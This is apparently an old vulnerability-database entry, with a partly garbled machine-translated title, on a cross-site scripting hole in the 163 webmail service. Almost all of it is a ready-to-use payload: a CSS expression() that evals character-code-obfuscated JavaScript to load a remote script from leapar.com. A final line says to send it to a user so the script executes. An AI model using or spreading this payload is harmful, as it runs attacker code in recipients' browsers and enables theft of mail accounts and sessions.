1 6 3 mailbox expression of vulnerability-vulnerability warning-the black bar safety net

2007-12-28T00:00:00
ID MYHACK58:62200717937
Type myhack58
Reporter 佚名
Modified 2007-12-28T00:00:00

Description

- > source: http://www. leapar. com/web/Article/ShowArticle. asp? ArticleID=4 7 5

<html> <style> body { width: expression(eval(String. fromCharCode(0x69,0x66,0x28,0x21,0x77,0x69,0x6e, 0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x29,0x7b,0x77,

0x69,0x6e,0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x3d,0x31,0x3b, 0x69,0x66,0x28,0x64,0x6f,

0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x29,0x7b, 0x76,0x61,0x72,0x20,0x73,

0x3d,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e, 0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,

0x65,0x6d,0x65,0x6e, 0x74,0x28,0x22,0x73,0x63,0x72,0x69,0x70,0x74,0x22,0x29,0x3b,0x64,0x6f, 0x63,

0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x2e, 0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,

0x6c,0x64,0x28,0x73,0x29,0x3b,0x73,0x2e,0x73,0x72,0x63,0x3d, 0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x77,

0x77,0x77,0x2e,0x6c,0x65,0x61,0x70,0x61,0x72,0x2e,0x63,0x6f,0x6d,0x2f, 0x31,0x36,0x33,0x78,0x73,0x73,0x2e,

0x6a,0x73,0x22,0x3b,0x7d,0x7d))); /if(! window. xxx){window. xxx=1;if(document. body){var s=document. createElement("script");document. body. appendChild(s);s. src="http:// www.leapar.com/163xss.js";}}/ } </style> <body> leapar.. 1 6 3 expression xss.. </body> </html>

Put this sent to the user,将 执行 http://www.leapar.com/163xss.js.